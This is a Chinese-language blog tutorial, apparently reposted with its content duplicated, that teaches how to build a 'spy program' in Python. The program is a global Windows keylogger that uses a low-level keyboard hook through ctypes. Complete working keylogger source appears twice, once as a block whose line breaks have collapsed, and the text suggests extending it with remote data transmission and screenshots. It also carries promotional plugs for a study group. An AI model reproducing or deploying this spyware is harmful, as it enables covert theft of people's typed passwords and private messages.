使用Python打造一款間諜程序,裝逼神器


知識點

這次我們使用python來打造一款間諜程序

程序中會用到許多知識點,大致分為四塊

  win32API 此處可以在MSDN上查看

  Python基礎重點在cpytes庫的使用,使用方法請點擊此處

  C語言基礎

  Hook

寫到在這裡還是提醒下,很多人學Python過程中會遇到各種煩惱問題,沒有人解答容易放棄。為此我建了個python學習資源圈裡面有2020年最新學習資料,如果你正在學python,可以關注我,後臺私信我 ‘p’ 免費獲取!還可以跟老司機討論!
接下來看程序的基本原理在於通過註冊Hook,記錄系統事件

那麼什麼是Hook呢

Hook 技術又叫做鉤子函數,系統在調用函數之前,鉤子程序就先捕獲該消息,鉤子函數先得到控制權,這時鉤子函數既可以加工處理(改變)該函數的執行行為,還可以強制結束消息的傳遞

註冊Hook時我們需要先導入DLL庫,在Python中我們使用ctypes來導入,導入方法如下

<code>user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")/<code>

我們導入了user32.dll和kernel32.dll

這兩個DLL有什麼用處呢

  user32.dll   是Windows用戶界面相關應用程序接口,用於包括Windows處理,基本用戶界面等特性,如創建窗口和發送消息

  kernel32.dll  控制著系統的內存管理、數據的輸入輸出操作和中斷處理

流程部分

知道了我們要使用什麼樣的工具,那麼第一步應該怎麼做呢

1.首先我們需要先註冊Hook到系統上,通過user32.dll中的SetWindowsHookExA函數,我們可以在系統上註冊鉤子

<code>HHOOK SetWindowsHookExA(
int idHook,
HOOKPROC lpfn,
HINSTANCE hmod,
DWORD dwThreadId
);/<code>

通過查看文檔我們看到SetWindowsHookExA函數的參數及參數類型如上所示,詳細文檔點擊此鏈接查看

通過文檔我們看到第一個參數idHook中填入鉤子的類型

WH_KEYBOARD_LL的常量值為13代表的意思是監視低級鍵盤輸入事件,我們此處來監聽鍵盤事件

第二個參數lpfn代表指向鉤子過程的指針,要填入鉤子過程(函數),我們可以在此處來添加額外代碼達到我們想要達成的目的

第三個參數hmod表示為DLL句柄,我們可以使用kernel32中的GetModuleHandleW來獲取句柄

最後一個參數dwThreadId我們填入0代表與同一桌面上所有的線程關聯

代碼如下

<code>user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)/<code>

如何使用Python來編寫我們的鉤子過程呢,通過ctypes文檔我們可以得知windows下使用WINFUNCTYPE來創建函數

此時我們發現有WINFUNCTYPE和CFUNCTYPE兩個函數,具體要使用哪一個呢,這兩個的區別為

  WINFUNCTYPE  為Windows下獨有的,通過使用使用stdcall調用約定的函數

  CFUNCTYPE   使用標準C調用約定的函數

<code>HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))/<code>

因為我們調用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會使用LowLevelKeyboardProc回調函數,同時我們也需要在Python定義它

LowLevelKeyboardProc數據結構如下

<code>LRESULT CALLBACK LowLevelKeyboardProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);/<code>

按照官方文檔提示 如果nCode小於零,則掛鉤過程必須將消息傳遞給CallNextHookEx函數,而無需進一步處理,並且應返回CallNextHookEx返回的值

我們轉換為Python代碼

<code>class KBDLLHOOKSTRUCT(Structure):
_fields_ = [
('vkCode', DWORD),
('scanCode', DWORD),
('flags', DWORD),
('time', DWORD),

('dwExtraInfo', DWORD)]

def hookProc(nCode, wParam, lParam):
if nCode < 0:
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
else:
# 此處插入我們的代碼
pass
return user32.CallNextHookEx(hooked, nCode, wParam, lParam)/<code>

最後在我們退出程序時還需要刪除Hook,不然大量的Hook會使系統運行緩慢,雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被調用。應用程序無法知道掛鉤是否已刪除。我們還是主動進行刪除

刪除需要使用user32.dllUnhookWindowsHookEx,參數為Hook句柄

<code>user32.UnhookWindowsHookEx(hooked)/<code>

下面貼上全部代碼

<code> 1 import sys
2 from ctypes import *
3 from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
4
5 user32 = CDLL("user32.dll")
6 kernel32 = CDLL("kernel32.dll")
7
8
9 class KBDLLHOOKSTRUCT(Structure):
10 _fields_ = [
11 ('vkCode', DWORD),
12 ('scanCode', DWORD),
13 ('flags', DWORD),
14 ('time', DWORD),
15 ('dwExtraInfo', DWORD)]
16
17

18 def uninstallHookProc(hooked):
19 if hooked is None:
20 return
21 user32.UnhookWindowsHookEx(hooked)
22 hooked = None
23
24
25 def hookProc(nCode, wParam, lParam):
26 if nCode < 0:
27 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
28 else:
29 if wParam == 256:
30 if 162 == lParam.contents.value:
31 print("Ctrl pressed, call Hook uninstall()")
32 uninstallHookProc(hooked)
33 sys.exit(-1)
34 capsLock = user32.GetKeyState(20)
35 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
36 if lParam.contents.value==13:
37 print("\\n")
38 elif capsLock:
39 print(chr(lParam.contents.value),end="")
40 else:
41 print(chr(lParam.contents.value+32),end="")
42 return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
43
44
45 def startKeyLog():
46 msg = MSG()
47 user32.GetMessageA(byref(msg), 0, 0, 0)
48
49
50 def installHookProc(hooked, pointer):
51 hooked = user32.SetWindowsHookExA(
52 13,
53 pointer,
54 kernel32.GetModuleHandleW(),
55 0
56 )
57 if not hooked:
58 return False
59 return True
60
61
62 HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
63 pointer = HOOKPROC(hookProc)
64 hooked = None
65 if installHookProc(hooked, pointer):
66 print("Hook installed")
67 try:

68 msg = MSG()
69 user32.GetMessageA(byref(msg), 0, 0, 0)
70 except KeyboardInterrupt as kerror:
71 uninstallHookProc(hooked)
72 print("Hook uninstall...")
73 else:
74 print("Hook installed error")/<code>

貼上我們的效果圖

使用Python打造一款間諜程序,裝逼神器

代碼

我們還可以再添加上額外的代碼比如數據傳輸,截屏等等 ^_^

我們常聽說:如果要操作某個軟件或者監聽某個軟件的話,可以使用鉤子( Hook )鉤住軟件,那這是如何操作的呢?用Python又如何實現呢?

本教程我們將 通過註冊Hook 打造一款間諜程序,來監聽win系統的筆記本,先給大家演示下效果吧!

使用Python打造一款間諜程序,裝逼神器

代碼

一、 Hook 技術

程序的基本原理在於通過 註冊Hook ,記錄系統事件。

那麼什麼是Hook呢?

Hook 技術又叫做 鉤子函數 ,系統在調用函數之前,鉤子程序就先捕獲該消息,鉤子函數先得到控制權,這時鉤子函數既可以加工處理(改變)該函數的執行行為,還可以強制結束消息的傳遞

註冊Hook時我們需要使用到兩個DLL庫: user32.dll kernel32.dll 。這兩個DLL有什麼用處呢:

  • user32.dll :是Windows用戶界面相關應用程序接口,用於包括Windows處理,基本用戶界面等特性,如創建窗口和發送消息
  • kernel32.dll :控制著系統的內存管理、數據的輸入輸出操作和中斷處理

二、實現

瞭解了鉤子的用處,那我們就來正式開始實現吧!

1.註冊鉤子

首先我們需要先註冊Hook到系統上,通過 user32.dll中的SetWindowsHookExA函數 我們可以在系統上註冊鉤子。

使用Python打造一款間諜程序,裝逼神器

文檔

通過查看 微軟官方文檔( https://docs.microsoft.com/zh-cn/windows/win32/api/winuser/nf-winuser-setwindowshookexa ) ,我們看到 SetWindowsHookExA 函數的參數及參數類型如上所示。

我們簡單介紹一下關於這幾個參數的含義:

  1. idHook:鉤子的類型,可以監聽消息、鍵盤、鼠標等等,這裡 我們來 監視低級鍵盤輸入事件作為案例演示!
  2. lpfn :鉤子函數,這裡就表示你監聽到事件後要怎麼處理,核心作用!
  3. hmod : DLL句柄(類似編號) , 我們可以使用 kernel32 中的 GetModuleHandleW 來獲取句柄
  4. dwThreadId : 我們填入0代表與同一桌面上所有的線程關聯

上圖中的代碼我們可以看出使用的是C++語法,這時候Python中的 ctypes庫 就可以助我們一臂之力!

ctypes 是 Python 的外部函數庫。它提供了與 C 兼容的數據類型,

並允許調用 DLL 或共享庫中的函數 。可使用該模塊以純 Python 形式對這些庫進行封裝。

Python使用 ctypes庫 註冊鉤子代碼:

<code>from ctypes import CDLL

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)
/<code>

更多關於 ctypes庫 使用教程可查看Python官方文檔:

https://docs.python.org/zh-cn/3.7/library/ctypes.html

2.編寫鉤子函數

上面我們說過 監視低級鍵盤輸入事件( WH_KEYBOARD_LL ) 作為案例演示!

而監聽鍵盤事件(WH_KEYBOARD_LL) 會使用 LowLevelKeyboardProc 回調函數,同時我們也需要在Python定義它!

使用Python打造一款間諜程序,裝逼神器

代碼

我們再次使用Python的 ctypes庫 定義一個回調函數!

defhookProc(nCode, wParam, lParam):

if nCode < 0:

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

else:

# 此處插入我們的代碼

pass

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

3.刪除Hook

最後在我們退出程序時還需要刪除Hook,不然大量的Hook會使系統運行緩慢。

雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被調用。

但是應用程序無法知道掛鉤是否已刪除,我們還是主動進行刪除。

刪除需要使用 user32.dllUnhookWindowsHookEx。

<code>def uninstallHookProc(hooked):
if hooked is None:
return
user32.UnhookWindowsHookEx(hooked)
hooked = None
/<code>

完整的鉤子函數:

defhookProc(nCode, wParam, lParam):

if nCode < 0:

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

else:

if wParam == 256:

if 162 == lParam.contents.value:

print("Ctrl pressed, call Hook uninstall()")

uninstallHookProc(hooked)

sys.exit(-1)

capsLock = user32.GetKeyState(20)

if

lParam.contents.value == 13:

print("\\n")

elif capsLock:

print(chr(lParam.contents.value), end="")

else:

print(chr(lParam.contents.value + 32), end="")

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

鉤子函數已經寫好了,但是這是Python函數,如何將它轉成c++函數呢?這樣windows才能讀取。

通過 ctypes文檔 我們可以得知Windows下使用WINFUNCTYPE來聲明函數原型!

使用Python打造一款間諜程序,裝逼神器

代碼文檔

將創建好的Python函數聲明為c++函數:

# 創建聲明,c_int表示函數入參類型

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

handleProc = HOOKPROC(hookProc)

最後我們將已經已經聲明好的函數原型 handleProc ,傳入最開始註冊的鉤子函數里:

user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)

5.完整代碼

上面的4步基本是主要的流程,一些更詳細的操作這裡不再過多介紹,給出全部代碼,不到100行。

<code>import sysfrom ctypes import *from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAMuser32 = CDLL("user32.dll")kernel32 = CDLL("kernel32.dll")class KBDLLHOOKSTRUCT(Structure):    _fields_ = [        ('vkCode', DWORD),        ('scanCode', DWORD),        ('flags', DWORD),        ('time', DWORD),        ('dwExtraInfo', DWORD)]def uninstallHookProc(hooked):    if hooked is None:        return    user32.UnhookWindowsHookEx(hooked)    hooked = Nonedef hookProc(nCode, wParam, lParam):    if nCode < 0:        return user32.CallNextHookEx(hooked, nCode, wParam, lParam)    else:        if wParam == 256:            if 162 == lParam.contents.value:                print("Ctrl pressed, call Hook uninstall()")                uninstallHookProc(hooked)                sys.exit(-1)            capsLock = user32.GetKeyState(20)            if lParam.contents.value == 13:                print("\\n")            elif capsLock:                print(chr(lParam.contents.value), end="")            else:                print(chr(lParam.contents.value + 32), end="")    return user32.CallNextHookEx(hooked, nCode, wParam, lParam)def startKeyLog():    msg = MSG()    user32.GetMessageA(byref(msg), 0, 0, 0)def installHookProc(hooked, handleProc):    hooked = user32.SetWindowsHookExA(        13,        handleProc,        kernel32.GetModuleHandleW(),        0    )    if not hooked:        return False    return TrueHOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))handleProc = HOOKPROC(hookProc)hooked = Noneif installHookProc(hooked, handleProc):    print("Hook installed")    try:        msg = MSG()        user32.GetMessageA(byref(msg), 0, 0, 0)    except KeyboardInterrupt as kerror:        uninstallHookProc(hooked)        print("Hook uninstall...")else:    print("Hook installed error")/<code>

Windows系統的同學可以試試效果哦~

使用Python打造一款間諜程序,裝逼神器

代碼

三、總結

本次教程給大家簡單的介紹了下: 在Python中如何使用ctypes庫調用Windows API。

當然,上面我們監聽到消息之後還可以遠程發送或者截屏保存等等操作都可以,最後在這裡還是提醒下,很多人學Python過程中會遇到各種煩惱問題,沒有人解答容易放棄。為此我建了個python學習資源圈裡面有2020年最新學習資料,如果你正在學python,可以關注我,後臺私信我 ‘p’ 免費獲取!還可以跟老司機討論,期待大家的騷操作哦!


分享到:


相關文章: